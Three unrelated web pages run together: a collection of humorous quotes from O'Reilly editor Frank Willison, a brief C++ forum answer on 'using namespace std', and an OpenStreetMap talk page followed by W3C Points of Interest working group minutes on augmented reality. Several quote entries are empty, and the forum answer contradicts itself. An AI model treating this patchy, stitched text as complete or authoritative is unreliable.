"Late at night, in the privacy of my home, while my family sleeps peacefully unawares, I make lists of weak areas for us. I define them differently each time: areas where we don't publish and ought to; topics for which we've signed many different authors but never got a completed book; areas where we have conspicuous and obvious gaps in an otherwise admirable program. Mostly, though, I use the definition you suggest: books that need to be updated and haven't been. I furrow my brow for some minutes; then I rip up the list, feed it to the dog, and go back to bed."
On Management
"It's difficult to exhort employees to Discipline and Self-Control when you know they call you Bowlhead behind your back."
On Saab Drivers
."
Bicycles That Pass in the Night
."
On Investing
"I believe that investing is, basically, morally wrong; but Computer Aided Investing is so wrong that it bears the personal stamp of Satan."
And More on Investing
"This sort of superficial, short-term success is common to those who've cut a bargain with Old Nick. Look at Ted Turner, Ted Bundy, and Faust. Ultimately, though, you end up married to Jane Fonda and wondering where you've gone wrong. But by then it's Too Late. Invest in some asbestos sandals.
"Let This Be a Lesson to You."
Man vs. Squirrel
."
On Gadgets
"But will a PDA have sufficient self-esteem to feel okay about asking directions? Will cell phones have the social skills necessary to rebuff the bogus location requests of a randy PDA? Will there be wireless access to Miss Manners? Why do I feel that, when devices are able to talk to each other, they'll prefer that activity to taking care of *my* needs? Who's paying the bills here?"
On Passive-Aggressive Behavior
"Part of the problem is passive-aggressive behavior, my pet peeve and bête noire, and I don't like it either. Everyone should get off their high horse, particularly if that horse is my bête noire. We all have pressures on us, and nobody's pressure is more important than anyone else's."
On Cakes and Diets
"Did everyone note that Hungry Minds controls both Betty Crocker and Weight Watchers Press? It's not only the minds which hunger; you can have your cake, but you can't eat it."
On What Makes a Good Proposal
"You have to like a proposal that quotes populist poetry from the Soul of Scotland."
On What Makes a Bad Proposal
"They opened up the Nutshell, and lo, there was no nutmeat. So they said, 'This too will pass.' And that's what we should do on this one: pass."
"Nobody has replied to this proposal. I will offer a comment: I would rather drink muddy water and sleep in a holler log."
On Alliteration in Titles
"We are not working on a Programming Perl for the Palm Pilot book: too many initial Ps. It would make for an unsanitary cover over time."
On Relatively Suited Authors
"No faroukhin' way are we going to hire a cowardly weakling who did the pusillanimous dumbass website at! Especially not one who uses so many exclamation points! Let him try to write a book! I'll snap his useless jockstrap!"
"Let's pass on this fellow. He's only 'relatively suited' anyway, he says."
On Age
"I may well be a fartist, Nat, but I am not old."
On Being Sued
"I get no respect. I can't even be threatened by normal people. Check out. They sell books like Sex Diary of a Metaphysician and Amazing Dope Tales. Why can't I be threatened by a decent professional publisher?
"I think you read a page, rip it out, fill it with grass, roll it up, and smoke it. It's a 2-for-1 sale."
On Lending Books
."
On Grammar and Copyeditors
"Nobody knows the language like those who correct others' peccadilo's, uh, peckadilloes, mmm, peccadildos, aah, forget it: mistakes all day."
On Suburbs
"How do these people know what's going on in their homes and neighborhoods all day? For all they know, their houses are being used by drug dealers, spies, or clever urban raccoons. Delivery men might notice such unauthorized activity. I would support legislation requiring some percentage of the residents of a neighborhood to stay home. People might remember why they have homes in the first place."
On Dry Cleaning
"I would certainly also support a return to the practice of wearing clean clothes to work and out in public. I hope that dry-cleaning experiences a renaissance and the era of Ratso Rizzo Casual Days at work is coming to end. If cleanliness is next to godliness, then dry-cleaning, after all, is practically a sacrament."
On Compliments
"Thank you for your strong endorsement of our publishing plans. We often say such things to ourselves, but when we hear our customers say them, we're more certain that we're not delusional."
On The End of the World, and Yes, It's Nigh
"Partway through Elliotte Rusty Harold's talk about namespaces, I realized where this relentless drive toward abstraction was taking us. Every new level of abstraction draws the computer-based world closer to the concepts we talk about in the real world. We've moved from waves to bits to data to information to infosets to application objects. As this process continues, some ambitious Comp Sci graduate student will realize that somebody already created the tree structure mapping the highest level of reality. That person was, of course, G. W. F. Hegel. Hegel's dialectic led him to create a map of reality that, at the top of the tree structure, divided everything into either the material or the spiritual realm. That dichotomy was resolved in God, and, my friends, that's about as far as you can go.
"That ambitious Comp Sci grad student, eager to get his Ph.D. and begin making real money, will create The Two Final Infosets: MatterML and SpiritML. Then, late one night, as rain falls in torrents and lightning flashes outside his laboratory windows, he'll run XSLT to transform the material world to the spiritual world. We'll be gone. The last material object on earth will be that graduate student's open copy of XML in a Nutshell. It makes an editor in chief proud, in a perverse kind of way."
On First Person Singular Possessive Pronouns
?"
On Italy
"What is it about Linux internals and Italy? I thought it was wine, women, and song over there; now it's kernel, stack, and drivers. Is tomorrow's Giancarlo Giannini romancing a motherboard today?"
On Adult Language
"Curl ain't no Flash, at least not yet. (I never thought I would as an adult write a phrase like 'Curl ain't no Flash.' What could it possibly mean?)"
On Perl Evangelists
"One word of warning: if you meet a bunch of Perl programmers on the bus or something, don't look them in the eye. They've been known to try to convert the young into Perl monks."
On Parody
"This particular ruling is especially disheartening because Gone with the Wind is, of all books, most deserving of a parody. Its unbelievable tale of Reconstruction in the South has done more harm than people know. . . . Parody plays an important role in the development and understanding of a culture. Making its expression less important than the property rights of the estate of a dead author is not just an intellectual property problem: It's the death of our culture and the beginning of the end of democracy and free speech. And I don't like Clark Gable, either."
On Monopolists
"I'd like to erect a big arena in the Silicon Valley where McNealy and Ballmer and Gates and Ellison and Case can don gladiator (or gladiolus) gear and just hammer each other the livelong day. There's not one of them you can trust, either advocating an idea or refuting the ideas of others. While McNealy criticizes Microsoft, I guarantee he's figuring out how to do something similar to steal the same money. Nothing is worse than a monopolist except for a frustrated, failed monopolist. A pox on the lot of them."
On Summer Vacations
'internship' and 'internment camp' both start with 'intern.'"
On Birthday Celebrations
"These birthdays are unacceptable. It is corporate policy that all employee birthdays fall on weekends each year, with no more than one birthday per day. Please fill out the Employee Birthday Request Form and submit it to your manager by April 1 of the preceding year. No unauthorized birthdays are to be celebrated."
On Hardware Demos
"People who believe demos probably go to Fred Astaire/Ginger Rogers movies and say, 'Golly, look how well they dance together, and they just met!'"
On Desk Fountains as Xmas Gifts
"They were meant to reduce stress, but I think they make people want to take a leak all the time. What could be more stressful than that?"
On New Year's Driving
"My father, a man who enjoyed the Pleasures of Drink, called New Year's Eve 'Amateur Night' and taught us all to stay off the road, preferably on the second floor of a secure dwelling, from the 30th of December through the 1st of January. I'll be breaking that rule this year, and in a rental vehicle to boot. Light a candle for me, and with the help of God, I'll see all of you in 1996."
On a 'New' Fenway Park
"I've just voted. Public funding is currently winning, almost certainly because of heavily subsidized voting by a foul coalition of out-of-state bankers, cynical real estate moguls, and partisan building trade organizations. True baseball fans, unmoved by greed, must vote to counter this pack of wolves.
"Of course, whichever way you vote is your business. Not trying to influence in any way, etc., etc.
"Fenway Frank"
On Water Quality
>Fire Hydrant Testing - April 29-May 10: Inman Square and Sherman Street
>areas. Testing may disturb sediment and cause water to appear rust
>colored. It is suggested that residents check water before doing
>laundry, as discolored water may cause stains. Call Cambridge Fire
>Department between 8am and 8:45am at 349-4021 for more info.
"These guys. Disturbing sediment does not make water 'appear rust colored.' That's a double obfuscation. It makes water rusty. The water *is* rust-colored (obfuscation #1) and it is that color because it contains *actual rust* (obfuscation #2).
"The O'Reilly book on the subject (Using and Managing Cambridge Water) would have said:
"Don't use the water for 24 hours after Cambridge tests fire hydrants in your neighborhood. If you do, you will get rust in your teeth and on your nice Gap clothes. As a workaround, drink bottled water and do your laundry in Brighton."
On Schedules
"I had a dream last night.
"We were all on an island. Everything on that island was collapsing, and we had to abandon it immediately. We had a plane to take us to the mainland, but it couldn't land, and we had no parachutes.
"My plan was for the plane to fly slowly and as low as possible, and we would all jump out.
"As we took off, to cheer everyone up, I said, 'Don't worry; we'll redo the master schedule after we see who survives.'"
On Claymation Christmas
"Not in my most cynical, sarcastic, misanthropic moment could I have perversely imagined suggesting a claymation version of the Gospel. Nathanael West would never have written 'Day of the Locust'.
"And as if the idea weren't cynical enough, they've cast Ralph Fiennes as Jesus' voice and Miranda Richardson as Mary Magdalene.
"There are not enough edible roots on the planet to allow these malefactors to pay their debt to society."
On Deepak Chopra
"This feeble, bourgeois paganism is the worst. Who would have thought that people would want paganism only if the fun is removed? No running through the woods naked, no polyrhythmic drumming. No selling your soul for eternal life; you'll get eternal life simply by living healthily. If you don't ever do anything wrong, you won't die. Sure.
"Keep Chopra; I'll take Beelzebub."
On Meg
"Don't be fooled by my boyish good looks. As of yesterday, I have been happily married (to *one* woman!) (uh, Meg, that is) for twenty years.
"So I'm taking tomorrow off to reacquaint her with me."
On Dom's Departure
"Dom, the one essential man we hoped would leave us never
Is going to the golden State Where People Say "Whatever."
Nursemaid to the editors, the one who brought relief, Dom
Charmed us all and transformed lowly Cambridge to his fiefdom.
"Dom, it's heartless now to leave us suff'ring without pity,
[ ... offending line elided; don't worry, it rhymes ... ]
Champion of compromise, emollients, and barter, Dom
Saved Production from the dreaded consequence of martyrdom.
"Though he wished it otherwise, his calendars were humor,
Mixing lies with speculation, guesstimates and rumor.
Sales asked, "Where are those books you promised us before, Dom?"
Dom replies, "I may have brought you pain, but never boredom."
"Going now to Walnut Creek (We don't know where that is, Dom),
We will miss his cheery smile, friendliness and wisdom.
If we had to pick the one who was your biggest fan, Dom,
We could go around the room and pick someone at random."
On SETI
"So that's where all the intelligence went!
"If you hear from any good editors, let me know; I'll let them work remotely."
On "Animal House"
"This film is a searing, angry metaphorical exploration of societal dissolution brought about by the conflict between marginalized citizens and an oppressive central authority. And they throw jello, too.
"To help viewers develop strong identification with the oppressed class in this movie, the LAVA Tripartite Commission (Linda Mui, Valerie Quercia, and Frank Willison) urge all employees to wear togas* to this event. (Those familiar with the film will remember that a toga party represents a key turning point.) We have alerted Bed, Bath, and Bacchanalia to have plenty of sheets for sale in their Cambridge and Fenway stores. (Ms. Quercia recommends the purchase of a flat sheet. 'Fitted' in the context of bedsheets does not indicate a more flattering cut when worn.)
"* Togas, in O'Reilly parlance, are officially called 'business casual.'
"We're looking for a volunteer to teach toga-tying tomorrow. Let's not let accidents spoil office camaraderie."
On Ridding the Office of Mice
"Read the following Robert Burns poem loudly. It's universally hated in the small rodent community. The mouse will leave out of principle."
On the Anarchist Cookbook
"I just went to Amazon to check up on The Anarchist Cookbook, having just mentioned it in a recent email to all of you. It was published in 1970 and was a very inflammatory document; it had a lot of cachet among radicals on campus, but it was a truly practical and therefore very scary manual of violent acts.
"I urge you to go to the Amazon page and read the author's poignant comments there. He says that he wrote the book in anger, at the age of 19 and in the midst of the Viet Nam War, and has come to regret it. He has tried several times to take the book out of print, but the original publisher (Lyle Stuart) and the publisher to which the book was then sold (Barricade Books, for crying out loud) have refused. As you'll be able to see by the comments, his book is favored now by people of the survivalist school, not his intention at all. It's a sad commentary; nobody should be plagued into his middle age by the crackpot ideas he espoused at 19."
Proposed Perl Book Titles
"Enough Perl Already!
"No Mas Perl
"Right-Brained Perl
"Painterly Perl"
On the New Yorker Magazine
"James Calamera told me that someone from the New Yorker wanted to talk to me about O'Reilly's publishing plans. I bought myself a tweed jacket with leather elbow patches, a bow tie, and cordovan Weejuns and called him. (His name was Pillsbury--you know he's old money.)"
On a Marketing Line for Java and XML (after we'd discovered a badly placed apostrophe on a blow-in card)
"Java and XML: Ask Someone Who Know's
"or
"Ask someone; who knows?
"I'll work on it some more."
On Learning Java
"Here is a sample from my upcoming book, a series of tutorial sonnets entitled Learn Java in 14 Lines!:
"Alas! I Married a Java Applet!
"My parents pled with ardent supplication,
That I should, if I marry, wed a lass.
But I chose you, a Java application,
And one, I blush to say, not from our class.
At first, you were both colorful and quick;
And on your speedy access I did dote.
Though on our Wedding Day we seemed to click,
O'er time, you grew increasingly... remote.
It seems that other users came to search you,
O'er all of us, your favors did you spread.
Though virtual, you knew not much of virtue,
Our love affair left hanging by a thread.
Romantic love with applets is most terrible.
I wish you weren't installed so network-shareable."
On .Net and Conflict of Interest
"This is a topic for which there is an existing principle: conflict of interest. 'Conflict of interest' does not require any overt act; it merely means that an entity has to choose between two actions which are in conflict with one another. A lawyer, for example, can't represent two defendants if defending one could hurt the case of the other. Slothful thinkers that we are, we've eroded that principle to say that everything is fine if there is no evidence of misdeeds; or, as the guy from ______ suggests, some outside agency certifies compliance with some privacy policy. I say, baloney; if a company wants both to protect your identity and make money from selling it, that company has an inherent conflict of interest. Microsoft cannot offer convincing identity protection because, as a vendor and a consumer of identity information, it has a conflict of interest.
"Anyone who gives private and financial information willingly to Microsoft should just cash out their accounts and play three-card monte instead; it will be more fun, their cash will last longer, and, after all their money is gone, those con artists will leave them alone."
On That Other Email Account
"Please excuse this email from a non-O'Reilly account. I keep this account for radical politics and pornography. And I had to come home before completing my email because--why was it again? Oh, right; this is where my family is."
On Waba
>We're not interested in a book on Waba by itself.
"I absolutely agree with Mike. Waba by itself has no rhythm. I am proposing a book combining a number of hot new technologies. It's called: Waba Java Wiki Tcl.
"That's a book you can chant in bars. Can't say it five times fast, no more beers for you."
On Aliens (re: Beyond Contact)
"Our extraterrestrial brothers and sisters (assuming biological reproduction) applaud (assuming they have hands) this development.
"One does worry about relying on an author who doesn't yet know how to pilot planes, but is doing so nevertheless. One hopes that God is his co-pilot, and He is paying attention."
On troff
"I love troff. It reminds me of runoff, which reminds me of my youth, when VMS was in flower and knowledge of EDT and runoff was all a lad needed to make a good living as a tech writer."
On Relaxing
"Take it easy, Bro."
On Hailstorm and Bill Paying
"Here's the other part of Hailstorm-type services that I don't get. I have cable, and when I don't pay my bill, they deny me TV shows. What if I don't pay my Microsoft bill? They have everything of mine: my contacts, calendar, documents, cellphone caller IDs, relationships... they have my business and my personal life. What if we have a dispute? How can I afford to argue with them?
"It's not even like when you don't pay your rent and they put your furniture on the sidewalk. They *keep* your furniture. If it's my data, I want it in my house on something I own.
"(Don't get the wrong idea; except for cable, I pay my bills. I know about the furniture thing from the movies.)"
On Email Over the Weekend
"A while ago, I suggested that we refrain from sending email over the weekend, so that people didn't feel that they had to check their email several times a day, every day, to stay abreast of current events. That didn't seem to catch on as an idea, so I suggested instead that we don't reply to email over the weekend, so that ideas didn't advance, issues didn't get resolved, and directions didn't get set until everyone had a chance to join in. That seems not to have caught everyone's imagination either.
"For those who have shown restraint over the weekend and regretted it, I now suggest that you participate as you feel is appropriate."
On Cloning Frank
>I'd describe him in more detail for you, but you likely
>already know him: just clone Frank Willison and make him a Republican.
"Impossible. That renders a null set."
On Health
"One of my health principles is: keep your body guessing. If you constantly change what you're doing, serious maladies can't build up an infrastructure. That's why I smoke a couple of cigarettes a week. It leads the body to think you're a smoker, but when the germs set up to attack your lungs, you go out for a jog instead. It foils the germs and leaves them dispirited."
On the Editor's Group
"In honor of e-business, I'm changing the name of my group to e-ditorsdotcom and I'm taking it public. I know that I'm 30 years too old to be the CEO, but I'm hiring a 20-year-old thespian to play the role until after the IPO. You know, I'll be a sort of Cyrano d' Entrepreneur."
On Editing
"Editor, edit thyself, I always say."
http://oreilly.com/news/frank_0701.html
Put "using namespace std;" in all your programs. To answer your question, yes, you need to include "using namespace std;" for strings. You could also write std:: before each string (std:: = standard namespace); it would be used in this manner: std::string.
Without "using namespace std;" you could even define your own class string or class cout and there will be no conflict.
If you write "using namespace std;" then you bring in everything from the std:: namespace. This is not limited to just the things that you use, so it can get dangerous, because you are bringing in hundreds of classes and functions. To limit the number of objects you are bringing in, try "using std::cout;". This will bring in only std::cout.
http://www.cplusplus.com/forum/general/97472/
User talk:JJJWegdam
OpenRailwayMap/Tagging in Netherlands
The page OpenRailwayMap/Tagging in Netherlands is intended as a tagging documentation of railway mapping and tagging in the Netherlands. Please move the contents describing the proposed import of ProRail data to an independent page outside the OpenRailwayMap namespace. Thank you. --Nakaner (talk) 20:25, 24 March 2015 (UTC)
Today I rebuilt the page in order to match the setup of its counterparts from other countries. Could you check if you are okay with its current setup? Apart from that, I never intended to link the ProRail import proposal to ORM; it was on the ORM page in order to inform possible Dutch ORM mappers about the data source. Granted: the old setup made it look like it was a project by ORM. I changed the text concerning ProRail in order to present it as plainly as possible. Kind regards. --JJJWegdam (talk) 20:10, 29 March 2015 (UTC)
File:Dutch_speed_signals.png
Do you have the source-files of File:Dutch_speed_signals.png?
JoKalliauer (talk) 16:50, 10 July 2017 (UTC)
Dear JoKalliauer,
It is indeed true that I have the source files. I created them using Microsoft Office's Visio, for the purpose of OpenRailwayMap.
Best regards, JJJWegdam
JJJWegdam (talk) 00:55, 13 August 2017 (UTC)
- In the German Wikipedia someone would like to use the pictures [1]. In which file-format did you create the signals (dwg,dxf,svg,png,pdf,eps)?
- Could you upload the source file to (for png,svg,pdf) or to (for dxf,dwg,eps) or send them by email (and under which license, e.g. Cc-zero (everyone is allowed to use/modify it without naming the author/source) or e.g. Cc-by-sa-4.0 (the author has to be named))?
- JoKalliauer (talk) 10:03, 13 August 2017 (UTC)
https://wiki.openstreetmap.org/wiki/User_talk:JJJWegdam
Agenda
See also: IRC log
<trackbot> Date: 30 March 2011
<danbri> yesterday's notes:
<danbri> draft minutes:
<matt> Scribe: danbri
discussing recap from yesterday
role/value of rdf
oh might be useful, 'Select the name, lowest and highest age ranges, capacity and pupil:teacher ratio for all schools in the Bath & North East Somerset district ' (uk open linked data example)
<martinL> test
<matt> trackbot, start meeting
<trackbot> Meeting: Points of Interest Working Group Teleconference
<trackbot> Date: 30 March 2011
<JonathanJ> see yesterday's minutes :
JonathanJ, yes I think that might be useful. Perhaps in terms of exploiting externally maintained data (e.g. school-related info)
<inserted> scribe: matt
<danbri> ahill mentioning eg. from yesterday, ... not a POI but potentially a movie showing in a local POI
<danbri> ronald, see also
[[introductions around the table again]]
<danbri> 15 Gigs of OSM data: -dontcrashyourbrowser- .de/pub/openstreetmap/planet-110323.osm.bz2
<scribe> Scribe: matt
Martin: I'm the CTO of Mobilizy/Wikitude.
Thomas: Bertine and I are working on an AR browser at a company called LostAgain.
cperey: Who has implemented a browser?
[[everyone but Matt and Dan]]
<scribe> scribe: cperey
Matt: new agenda
<matt> -> Day 2 Agenda
<danbri> 'lost again':
Matt: AR Landscape Drafts
... what Jonathan has put up and the AR vocabulary, to extend the core work, what is the shape of this, get an editor
Alex: do we have room for AR Notes? Yes, Landscape Note is part of what we will do
Matt: our charter
<matt> POI Charter
Matt: first is POI recommendation. Then, the charter says that we will produce two AR Notes. A note is a slightly less rigorous thing
... could be published on our web site. Vocabulary to extend the core recommendation. Might include presentational characteristics... could include anything
... we have NOT started the Vocabulary at all yet
<danbri>
Matt: we have AR Landscape.
<danbri>
<matt> scribe: matt
cperey: It's not a gap analysis document
... This is more of a product feature landscape an inventory of what's in the products today.
... I'm looking to codify the standards that describe the different functional blocks that AR uses.
<scribe> scribe: cperey
<scribe> scribe: matt
cperey: I think that this is will focus on those parts that are about making AR on the Web. There may be scenarios where there is a client.
<scribe> scribe: cperey
matt: this is just a starting point. we will discuss it. I think this will evolve into a gap analysis of current standards wrt the Web and AR.
Ronald: is this group chartered to look at the full range of AR?
... or are we going to focus on POI
Matt: we are broader than just the POI in this area
bit from the charter... Dan... we should begin the conversations
Matt: there is distinct possibility that when we get core draft done, we can recharter
Alex: but I think what Ronald is asking about is the AR note
<danbri> (so where are we collecting info about geo APIs: e.g. ...etc etc ...?)
Alex: my feeling that the AR notes was restricted to what this group is chartered to speak about
... what is the POI we are putting forward and how it applies to AR
<matt> danbri, I'd suggest adding them to:
Alex: if it includes talking about 3D, then great, it probably means that talking about Device APIs, we don't need to cover the whole gamut
... in some sense, a landscape of all existing browser is not a requirement of our discussion, to understand how we go forward
... it is not necessarily in our charter that we cover all of that depth
<danbri> 'The WG may also publish use case and requirements, primers and best practices for Points of Interest as Working Group Notes. ' --
Matt: should we look at list of mobile user agents on browser page
<danbri> (so if someone e.g. wanted to make a 'how real projects are putting geo-related info in QR Codes, imho that'd be in scope for a separate Note)
martin: supported platforms could be added to the tables
Matt: Jonathan, how do you want to proceed?
Jonathan: I'd like to talk about the document
... as mentioned, the landscape is main document, browser document is the details of one area
... I have discussed with many Korean people and community
... gathered many criteria so far
... first, is the comparison targets. I think we need to make a narrow scope for AR apps
<danbri> (matt, ok I've added them to )
Jonathan: because too many applications in AR domain. We can make technical specification for our standard. We need to narrow the scope
... I have written the features. First the .. second, linking to web services, third is rendering, fourth is...
... Collected a list in the document, about 13 products
... Christine made some comments. this are on the page
Alex: where do we draw the line? our browser is not commercially supported
... it is in the iTunes store but anyone can make an application. its penetration is negligible but the features are important because it demonstrates some of what we are talking about
... some applications/user agents don't codify AR, read it...
Thomas: the data standard must look at main commercial ones. because if the standard can't do what they say that they do
Martin: mixare is downloadable, available outside of the laboratory environment
Jonathan: need to consider extensibility
Alex: the list is probably right.
Martin: as soon as something is publically in use
Matt: we stop collecting when we have all the features covered
Alex: Google Goggles is AR
... Recognizes a POI
... information about the POI pops up
... it may have features
Thomas: API for visual recognition engine could be on their roadmap. The feature that they have is one which AR browsers will have
Ronald: Visual Search and AR will merge
Martin: we can't separate Geo and Visual
Alex/Thomas: Nokia Point and Find should be added
<matt> ACTION: Jonathan to add Nokia Point and Find: [recorded in]
<trackbot> Created ACTION-38 - Add Nokia Point and Find: [on Jonathan Jeon - due 2011-04-06].
<matt> ACTION: Jonathan to fix link for Wikitude [recorded in]
<trackbot> Created ACTION-39 - Fix link for Wikitude [on Jonathan Jeon - due 2011-04-06].
Alex: Nokia Point and Find at some point you could download it for a phone
... some features I've seen demoed, are not available to everyone, but worth looking at and considering again
<JonathanJ> I referenced a good report from Edinburgh univ. -
Alex: some of the things that Petros mentioned , aggregating POIs into footprint of buildings
... street view like browsing
... so does StreetView belong on this list
Thomas: and you can use the gyro in your phone to see things
Alex: it's not strictly AR
but what should we be focused on?
<matt> Petro/Nokia's position paper
Alex: I want to say that the definition is not tight or exclusive to keep StreetView and Goggles out
... these are close enough to be considered here
<matt> close ACTION-39
<trackbot> ACTION-39 Fix link for Wikitude closed
Alex: it's remote, browser based, worth considering
Thomas: AR is a potential output method, the same data can be viewed on many different applications, in an AR form if appropriate
... non-issue what you call AR or not
Alex: and at some point there will be a maturation of this definition
... like VR, lots of things expanded outside the original definition
<Zakim> danbri, you wanted to ask about qrcodes
Alex: It's a visualization method for POI
Dan: what about QR codes?
... I find AR unconstrained, it's fine, does lots of cool things
... useful for navigation in real time
... QR codes are quite well understood technology
... I'd like to make a pitch that they are in scope for this group
... I just want one standards thing that is part of QR code
<matt> GIST QR codes
Thomas: AR should be small enough to act as a direct link to the data
<matt> [GIST]QR_Code_Data_Representation_for_AR.pdf QR Code Data Representation for AR
Thomas: QR code is very limited in what and how much it can store
Alex: I second what Dan is saying
<danbri> can we resolve unanimously that this group hopes to make some contribution around the use of QR codes for POIs? (whether documenting existing practice, or suggesting a design...)
Alex: for the notes, for us considering the implications of a POI standard, this use case of seeing a QR code and snapping it is applicable
... it should be in scope
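[The QR-code-as-direct-link idea discussed above can be sketched without any QR library, since a QR code just encodes a string. A minimal illustration using the RFC 5870 `geo:` URI scheme; the coordinates and function name are made up for this example:]

```python
def poi_qr_payload(lat, lon, uncertainty_m=None):
    """Build a geo: URI (RFC 5870) suitable for encoding in a QR code.

    The returned string is the payload a QR generator would encode;
    scanner apps that understand geo: URIs open it as a location.
    """
    uri = f"geo:{lat:.6f},{lon:.6f}"
    if uncertainty_m is not None:
        uri += f";u={uncertainty_m}"  # optional uncertainty parameter, in metres
    return uri

# Illustrative POI in Amsterdam:
payload = poi_qr_payload(52.370216, 4.895168, uncertainty_m=10)
```

[This covers only the "location in a QR code" case; a code could equally carry a plain URL pointing at richer POI data, which is the limited-capacity trade-off Thomas mentions.]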
Martin: looking at the list, these are all mobile applications
... we should also include in scope non-mobile applications
... like Total Immersion things on desktop
Alex: but didn't you (Jonathan) want to restrict it to mobile browsers
<danbri> re QR code capacity, see my thread last year on lengths of URIs 'in the wild'
Alex: at the same time, you could imagine street view
... if you have been excluding it from the discussion is the wrong thing to do
Thomas: it would be ludicrous if you had to pull down data from one source for desktop and a different place for mobile
<danbri> oops wrong link. 'URI length statistics "in the wild"?'
Thomas: for content providers that would be a show stopper
... we want to avoid all the systems that labs have done but at the same time, it is appropriate to include StreetView
Alex: I recommend that it be included in the list
Thomas: if you are dealing with image relative position, there is a great advantage to including them
... at the end of the day it is a marker and a model (3D model) on the marker
... a standard way of associating a marker and a 3D model regardless of where it is would be useful
Jonathan: we need more time
Luca: my feeling for AR is that it is something that you put on the real world
... for example, StreetView it is not exactly AR. Desktop can be included as long as you use a webcam to put things in the real world
<JonathanJ> It is not problem, what product is included or excluded
Luca: for me, for what I include when I think AR, it is display of information on top of the real world. Google Maps is not AR. You do not see the real world
<danbri> Luca, not everyone can see...
Alex: if you are walking down the street and you take away the background
Jacques: you are switching from AR to mixed reality
Dan: is AR only for people with good vision
Thomas: geo-located sound is in scope
Alex: he's talking about a synthesized background. but if you take away the background and you see the same content, the same rendering engine is doing it
... that is AR
<JonathanJ> I don't think AR only for people with good vision.
Luca: because we don't have to be on the street for us to have AR experience
... I don't want to say that only geo located can be AR. It can be visual recognition, sensors, printers, etc all of this is included and in scope
<JonathanJ> ISSUE: what AR is our scope
<trackbot> Created ISSUE-6 - What AR is our scope ; please complete additional details at .
Alex: overall features.... is there anything on this list that doesn't make sense. I see the idea. Does it have an SDK
... is it using Points of Interest?
Jonathan: I can see that filling out this table is going to get messy. Everyone is going to be full of caveats
Thomas: what user interaction standards should be defined
... define a click action
Alex: for me the biggest differentiation is Web 1.0 and Web 2.0
... whether you can put your finger on it and stretch the world, manipulate the model
... data representation is an important feature to add
... I think is of value. We use KML and HTML for Argon
... I don't know what Acrossair does
Martin: Acrossair is closed and proprietary system
Alex: edits into the document
Thomas: should the data representation be separate from the POI? Is that important? Is that relevant to discuss
Alex: for first pass, we list what we know about these things.
... filling in the table
... does anyone at this table know anything about Google Goggles data representation
Thomas: it is probably going to be like MapAPI
<martinL>
Alex: how they do it. this is where the rubber meets the road
Ronald: you get XML back and you get a URL to which you can go
Alex: is that a POI? Did it return a POI?
Martin: is a POI tied to a location?
Alex: if I'm standing in front of building, and I shoot an image, and I get the name of the building, have I got a POI?
... yes
Thomas: whatever links the real world to the virtual content is POI
Alex: I pick up my phone and I look at the courtyard and I see a Polar bear. it is AR.
... nothing is there but a lot of people who argue it is a POI
... sometimes these lines are difficult to draw
... we agree that kooaba is returning data and POI
Ronald: It's JSON. No ties to any other standards at this time
Alex: but the JSON is returning POI and data
... maybe because what we need is a column that describes how we are triggering in some sense
... Have it in the table
... why don't we change user interaction
Dan: finish the column
... ovijet
... put proprietary
Jonathan: they are visual search
Alex: what is sekaicamera
... it is social AR in geospace
... this doesn't answer the question of data representation
Sekai camera is also JSON
<matt> Mixare JSON docs
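[The JSON responses mentioned for kooaba, Sekai Camera, and Mixare are each vendor-specific; as a sketch only, a hypothetical minimal POI payload and its parsing might look like this (the field names and URL are illustrative, not any vendor's actual schema):]

```python
import json

# A made-up minimal POI payload; real services each define their own shape.
raw = '''{
  "pois": [
    {"name": "Rijksmuseum", "lat": 52.36, "lon": 4.8852,
     "link": "https://example.org/poi/rijksmuseum"}
  ]
}'''

data = json.loads(raw)
# Flatten into (name, lat, lon) tuples a client could render as annotations.
nearby = [(p["name"], p["lat"], p["lon"]) for p in data["pois"]]
```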
Alex: wikitude
Martin: ARML, based on KML
Alex: when we say KML we mean XML
Thomas: the format is the same, but KML has things already sorted; it already specifies location
Alex: what is the difference between name space and ...
... markup language
Dan: XML was born as a simplification of SGML
... it XML was created, they wanted to interleaved
<matt> xmlns is the default, prefix is the non-default ones
<danbri> re XML namespaces see
<JonathanJ> There is a missing point. I want to compare, from the 1st column (Data Representation), what 2D and 3D formats they support.
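[The xmlns point — a default namespace versus prefixed extension namespaces — is easy to see in practice. A sketch parsing a KML-style placemark with Python's standard ElementTree; the document and the `ar:` extension namespace are made up, only the KML 2.2 namespace URI is real:]

```python
import xml.etree.ElementTree as ET

kml = '''<kml xmlns="http://www.opengis.net/kml/2.2"
     xmlns:ar="http://example.org/ar-ext">
  <Placemark>
    <name>Eiffel Tower</name>
    <Point><coordinates>2.2945,48.8584,0</coordinates></Point>
    <ar:model>https://example.org/models/tower.dae</ar:model>
  </Placemark>
</kml>'''

# The default (unprefixed) namespace still needs a prefix for queries;
# "ar" maps to the hypothetical AR extension vocabulary.
ns = {"k": "http://www.opengis.net/kml/2.2",
      "ar": "http://example.org/ar-ext"}

root = ET.fromstring(kml)
placemark = root.find("k:Placemark", ns)
name = placemark.find("k:name", ns).text
coords = placemark.find("k:Point/k:coordinates", ns).text
model = placemark.find("ar:model", ns).text
```

[This is the "pull the KML tags we need and add AR tags" pattern Martin describes: existing tags stay in the KML namespace, additions live in their own.]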
Coffee break.
Alex: it's become obvious that we need to focus on our objective. We don't have time to flesh out the document here
... we need to focus on what's available and how our POI standard effect people who want to deliver AR
... how do we answer that
Matt:
Matt: technologies listed here. some with work going on in W3C
<JonathanJ> see
Matt: gyroscope work in progress
... microphone work in progress
Thomas: these are all very big things,
martin: there are other people doing work on these
... as a reference, we should point to others who are working on this
Dan: I don't see video feed here
Jonathan: add camera input
Matt: add the applicable standards
Alex: where are we going to put this
<matt> scribe: ahill
thomas: should we separate device access standards from POI standards?
<cperey>
<matt> ACTION: matt to add links to existing standards [recorded in]
<trackbot> Created ACTION-40 - Add links to existing standards [on Matt Womer - due 2011-04-06].
<danbri> (finished editing now)
<cperey>
agreed
thomas: what about user rotation in the POI spec?
ronald: we've discussed the orientation of content, but not the orientation of the user
martin: we need to separate meta data of POI, geo-location and data representation (visualization)
<matt> scribe: cperey
martin: we need a clear separation. We go to this point and not further
Alex: I never felt that our responsibility would be to render the content
... the question is how do we facilitate the data coming with the POI
Thomas: there is some overlap, may want inline data with the POI; you don't want to link to a remote text file if you want only a two line...
Bertine: maybe a CSS?
Alex: we all have in our minds, ideas of POIs that include label and description
... you're saying that's so canonical that we don't want an extra standard for describing that
... does this argue that there should be a place in the standard to relate that?
Thomas: you wouldn't embed a JPEG in an HTML page
... same with a model. If you have a short bit of text it makes more sense for it to be in line
... it has to be related
... needs to be standard for a simple label annotation. It needs to be in a Standard
